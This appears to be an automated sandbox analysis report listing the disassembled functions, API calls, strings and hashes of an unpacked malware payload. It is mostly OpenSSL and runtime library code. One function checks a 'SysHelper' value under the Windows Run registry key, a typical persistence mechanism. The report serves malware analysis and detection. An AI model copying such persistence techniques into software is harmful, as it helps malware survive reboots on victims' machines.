                                                                                                                                                                          • Part of subcall function 003349A0: GetLastError.KERNEL32(?,00334B72), ref: 00334A2A
                                                                                                                                                                          • Part of subcall function 003349A0: GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00334B72), ref: 00334A65
                                                                                                                                                                          • Part of subcall function 003349A0: _wcsstr.LIBCMT ref: 00334A8A
                                                                                                                                                                        • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00362316
                                                                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00362323
                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 00362338
                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00362341
                                                                                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,00000010), ref: 0036234E
                                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0036235C
                                                                                                                                                                        • GetObjectA.GDI32(00000000,00000018,?), ref: 0036236E
                                                                                                                                                                        • BitBlt.GDI32(?,00000000,00000000,?,00000010,?,00000000,00000000,00CC0020), ref: 003623CA
                                                                                                                                                                        • GetBitmapBits.GDI32(?,?,00000000), ref: 003623D6
                                                                                                                                                                        • SelectObject.GDI32(?,?), ref: 00362436
                                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 0036243D
                                                                                                                                                                        • DeleteDC.GDI32(?), ref: 0036244A
                                                                                                                                                                        • DeleteDC.GDI32(?), ref: 00362450
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Object$CreateDelete$BitmapCapsCompatibleDeviceInformationSelectUserWindow$AddressBitsDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                                                                                        • String ID: .\crypto\rand\rand_win.c$DISPLAY
                                                                                                                                                                        • API String ID: 151064509-1805842116
                                                                                                                                                                        • Opcode ID: 4eeedae8e791e2981042005298e0d992fad9a1ff2e47ee14f4a6ccdf886208bf
                                                                                                                                                                        • Instruction ID: 2c91d2dba0356b9be619777cc3d75905eef9dea6222fab3100b3f057a1abedc9
                                                                                                                                                                        • Opcode Fuzzy Hash: 4eeedae8e791e2981042005298e0d992fad9a1ff2e47ee14f4a6ccdf886208bf
                                                                                                                                                                        • Instruction Fuzzy Hash: AF419671544700EBD3229B759C46F6FBBFCFF8AB50F014519FA54962A1DB71D8008BA2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 003435B0 Relevance: 21.5, APIs: 7, Strings: 5, Instructions: 475COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _strncmp
                                                                                                                                                                        • String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
                                                                                                                                                                        • API String ID: 909875538-2733969777
                                                                                                                                                                        • Opcode ID: b25546bc12d8c16b08739c854dae2cee3f6687a3fdd1d63860831ebc4cd35d94
                                                                                                                                                                        • Instruction ID: 6b9a449f06320c2f11ebfa08065eb62468f0556c3eac3146a72a362c28d381a1
                                                                                                                                                                        • Opcode Fuzzy Hash: b25546bc12d8c16b08739c854dae2cee3f6687a3fdd1d63860831ebc4cd35d94
                                                                                                                                                                        • Instruction Fuzzy Hash: 3BF1A5716483416BE723EA64DC82F9BB7D89F55704F040829F989DF283E774EA098793
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00305A97 Relevance: 19.6, APIs: 13, Instructions: 84COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1503006713-0
                                                                                                                                                                        • Opcode ID: a679a8657c5c68cb212a824ff10633027cc4a3dd8d6d965d4dcc1fd8b6e17e36
                                                                                                                                                                        • Instruction ID: 054bf4a7a3574298742084a6b960152fceb3c5eb15db6fe2d456518068e8d15e
                                                                                                                                                                        • Opcode Fuzzy Hash: a679a8657c5c68cb212a824ff10633027cc4a3dd8d6d965d4dcc1fd8b6e17e36
                                                                                                                                                                        • Instruction Fuzzy Hash: 4A21D13660BA01ABEB277F64DC26F0FBBE8DF41720F214429F484594E2EA219910CF50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00307B21 Relevance: 18.1, APIs: 12, Instructions: 84COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • DecodePointer.KERNEL32 ref: 00307B29
                                                                                                                                                                        • _free.LIBCMT ref: 00307B42
                                                                                                                                                                          • Part of subcall function 00300BED: HeapFree.KERNEL32(00000000,00000000,?,0030507F,00000000,0030500D,?,00303F7C,?,002FE6CC,00000000), ref: 00300C01
                                                                                                                                                                          • Part of subcall function 00300BED: GetLastError.KERNEL32(00000000,?,0030507F,00000000,0030500D,?,00303F7C,?,002FE6CC,00000000,?,?,?,?,?,003AB3EC), ref: 00300C13
                                                                                                                                                                        • _free.LIBCMT ref: 00307B55
                                                                                                                                                                        • _free.LIBCMT ref: 00307B73
                                                                                                                                                                        • _free.LIBCMT ref: 00307B85
                                                                                                                                                                        • _free.LIBCMT ref: 00307B96
                                                                                                                                                                        • _free.LIBCMT ref: 00307BA1
                                                                                                                                                                        • _free.LIBCMT ref: 00307BC5
                                                                                                                                                                        • EncodePointer.KERNEL32(009E2168), ref: 00307BCC
                                                                                                                                                                        • _free.LIBCMT ref: 00307BE1
                                                                                                                                                                        • _free.LIBCMT ref: 00307BF7
                                                                                                                                                                        • _free.LIBCMT ref: 00307C1F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3064303923-0
                                                                                                                                                                        • Opcode ID: e0e30a74c9cb290a159cce6fb19fece1b8442ecb5b3bfd08b96b804bcf86de25
                                                                                                                                                                        • Instruction ID: c585b41f8a144414bf1a88815c69c949273220bd1e63c4305a6876b79db3ae11
                                                                                                                                                                        • Opcode Fuzzy Hash: e0e30a74c9cb290a159cce6fb19fece1b8442ecb5b3bfd08b96b804bcf86de25
                                                                                                                                                                        • Instruction Fuzzy Hash: DE216276D0A5918BCB2B9F9AFC90F297768E704724F15053AE9045B2E1CB74BC81CE90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002F1B90 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 110stringcomCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 002F1BB0
                                                                                                                                                                        • CoCreateInstance.OLE32(003AE908,00000000,00000001,003AD568,00000000), ref: 002F1BC8
                                                                                                                                                                        • CoUninitialize.OLE32 ref: 002F1BD0
                                                                                                                                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000007,?), ref: 002F1C12
                                                                                                                                                                        • SHGetPathFromIDListW.SHELL32(?,?), ref: 002F1C22
                                                                                                                                                                        • lstrcatW.KERNEL32(?,003E0050), ref: 002F1C3A
                                                                                                                                                                        • lstrcatW.KERNEL32(?), ref: 002F1C44
                                                                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,00000100), ref: 002F1C68
                                                                                                                                                                        • lstrcatW.KERNEL32(?,\shell32.dll), ref: 002F1C7A
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcat$CreateDirectoryFolderFromInitializeInstanceListLocationPathSpecialSystemUninitialize
                                                                                                                                                                        • String ID: \shell32.dll
                                                                                                                                                                        • API String ID: 679253221-3783449302
                                                                                                                                                                        • Opcode ID: 6a28b9d3ca85bbbc601ceab7727ed9a79d0deb4da0a9bdd1291001276f6a7572
                                                                                                                                                                        • Instruction ID: fa9a5e2f8d11f2a20f8aef314985c1dc11bc21659a2e3f62565da9149fdb6084
                                                                                                                                                                        • Opcode Fuzzy Hash: 6a28b9d3ca85bbbc601ceab7727ed9a79d0deb4da0a9bdd1291001276f6a7572
                                                                                                                                                                        • Instruction Fuzzy Hash: B0412C74A50219AFDB11CBA4CC88FEABBBCEF49705F0044A9F605D7190D7B0AE458B50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 003349A0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 107libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleA.KERNEL32(FFFFFFFF,?,00000001,?,00334B72), ref: 003349C7
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 003349D7
                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 003349FB
                                                                                                                                                                        • GetProcessWindowStation.USER32(?,00334B72), ref: 00334A01
                                                                                                                                                                        • GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00334B72), ref: 00334A1C
                                                                                                                                                                        • GetLastError.KERNEL32(?,00334B72), ref: 00334A2A
                                                                                                                                                                        • GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00334B72), ref: 00334A65
                                                                                                                                                                        • _wcsstr.LIBCMT ref: 00334A8A
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                                                                                        • String ID: Service-0x$_OPENSSL_isservice
                                                                                                                                                                        • API String ID: 2112994598-1672312481
                                                                                                                                                                        • Opcode ID: 7015f4dc17e0453fbf911d28a75e4522967cd0254fb44a43f14c87f6c3751cad
                                                                                                                                                                        • Instruction ID: c34af2333330ce3b5d7ce752508f821eb97f3d821e88fd11e0c2b48ef8d48f99
                                                                                                                                                                        • Opcode Fuzzy Hash: 7015f4dc17e0453fbf911d28a75e4522967cd0254fb44a43f14c87f6c3751cad
                                                                                                                                                                        • Instruction Fuzzy Hash: 7B31A731A502099BDB22DBBAEC46BAE77BCEF45721F104259E816D71D0EB30AD00CB51
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00334AE0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 75registrywindowCOMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetStdHandle.KERNEL32(000000F4,00334C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,0033480E,.\crypto\cryptlib.c,00000253,pointer != NULL,00000000,00331D37,00000000,002ECDAE,00000001,00000001), ref: 00334AFA
                                                                                                                                                                        • GetFileType.KERNEL32(00000000), ref: 00334B05
                                                                                                                                                                        • __vfwprintf_p.LIBCMT ref: 00334B27
                                                                                                                                                                          • Part of subcall function 0030BDCC: _vfprintf_helper.LIBCMT ref: 0030BDDF
                                                                                                                                                                        • vswprintf.LIBCMT ref: 00334B5D
                                                                                                                                                                        • RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 00334B7E
                                                                                                                                                                        • ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 00334BA2
                                                                                                                                                                        • DeregisterEventSource.ADVAPI32(00000000), ref: 00334BA9
                                                                                                                                                                        • MessageBoxA.USER32(00000000,?,OpenSSL: FATAL,00000010), ref: 00334BD3
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Event$Source$DeregisterFileHandleMessageRegisterReportType__vfwprintf_p_vfprintf_helpervswprintf
                                                                                                                                                                        • String ID: OPENSSL$OpenSSL: FATAL
                                                                                                                                                                        • API String ID: 277090408-1348657634
                                                                                                                                                                        • Opcode ID: 0a0953ab53ecfbdc78fc79beb51c8ecf97730deefaf22dea93649cc3245d5db1
                                                                                                                                                                        • Instruction ID: fb4f33c0dccff4938b4aab9b220a0f4ed547e1415cfa0d9d7850435afaca6c57
                                                                                                                                                                        • Opcode Fuzzy Hash: 0a0953ab53ecfbdc78fc79beb51c8ecf97730deefaf22dea93649cc3245d5db1
                                                                                                                                                                        • Instruction Fuzzy Hash: F521D471648300ABE772ABA0DC87FEFB7DCEF98701F444819F6998A1D0EAB494408753
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002F2360 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 61registrystringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 002F2389
                                                                                                                                                                        • _memset.LIBCMT ref: 002F23B6
                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 002F23DE
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 002F23E7
                                                                                                                                                                        • GetCommandLineW.KERNEL32 ref: 002F23F4
                                                                                                                                                                        • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 002F23FF
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 002F240E
                                                                                                                                                                        • lstrcmpW.KERNEL32(?,?), ref: 002F2422
                                                                                                                                                                        Strings
                                                                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 002F237F
                                                                                                                                                                        • SysHelper, xrefs: 002F23D6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
                                                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
                                                                                                                                                                        • API String ID: 122392481-4165002228
                                                                                                                                                                        • Opcode ID: bbb4922d5c812c8b42b333b2a84e51f93fbe407870519f4284ca500933ca6ab6
                                                                                                                                                                        • Instruction ID: 07120fb9ba5ebe650978a1d40b58ff62e71d76a4f7dd9559b157f9a3cb1e6701
                                                                                                                                                                        • Opcode Fuzzy Hash: bbb4922d5c812c8b42b333b2a84e51f93fbe407870519f4284ca500933ca6ab6
                                                                                                                                                                        • Instruction Fuzzy Hash: B711597291020DFBDF11DFA0DC49FEEB7BCBB05704F0045A5B609E2191DBB49A889B90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0032F26C Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 58COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • std::exception::exception.LIBCMT ref: 0032F27F
                                                                                                                                                                          • Part of subcall function 00310CFC: std::exception::_Copy_str.LIBCMT ref: 00310D15
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0032F294
                                                                                                                                                                          • Part of subcall function 00310ECA: RaiseException.KERNEL32(?,?,0032F26B,?,?,00000000,?,?,?,?,0032F26B,?,003E81FC,?), ref: 00310F1F
                                                                                                                                                                        • std::exception::exception.LIBCMT ref: 0032F2AD
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0032F2C2
                                                                                                                                                                        • std::regex_error::regex_error.LIBCPMT ref: 0032F2D4
                                                                                                                                                                          • Part of subcall function 0032EF74: std::exception::exception.LIBCMT ref: 0032EF8E
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0032F2E2
                                                                                                                                                                        • std::exception::exception.LIBCMT ref: 0032F2FB
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0032F310
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
                                                                                                                                                                        • String ID: bad function call$le;
                                                                                                                                                                        • API String ID: 2464034642-2873060509
                                                                                                                                                                        • Opcode ID: 874f4b1aefe7e2686ec2864b456d25cc55dc21b7017db7fb19728d64c3ae8892
                                                                                                                                                                        • Instruction ID: 2e421aa92490773838dbf2db1578659460b6e35a63a91f5ce6ca5f84018bde15
                                                                                                                                                                        • Opcode Fuzzy Hash: 874f4b1aefe7e2686ec2864b456d25cc55dc21b7017db7fb19728d64c3ae8892
                                                                                                                                                                        • Instruction Fuzzy Hash: 9211CE78D0020DBBCF0AFFA5C546CDDBB7CEA04344F408966BD249B546EB74A3998B91
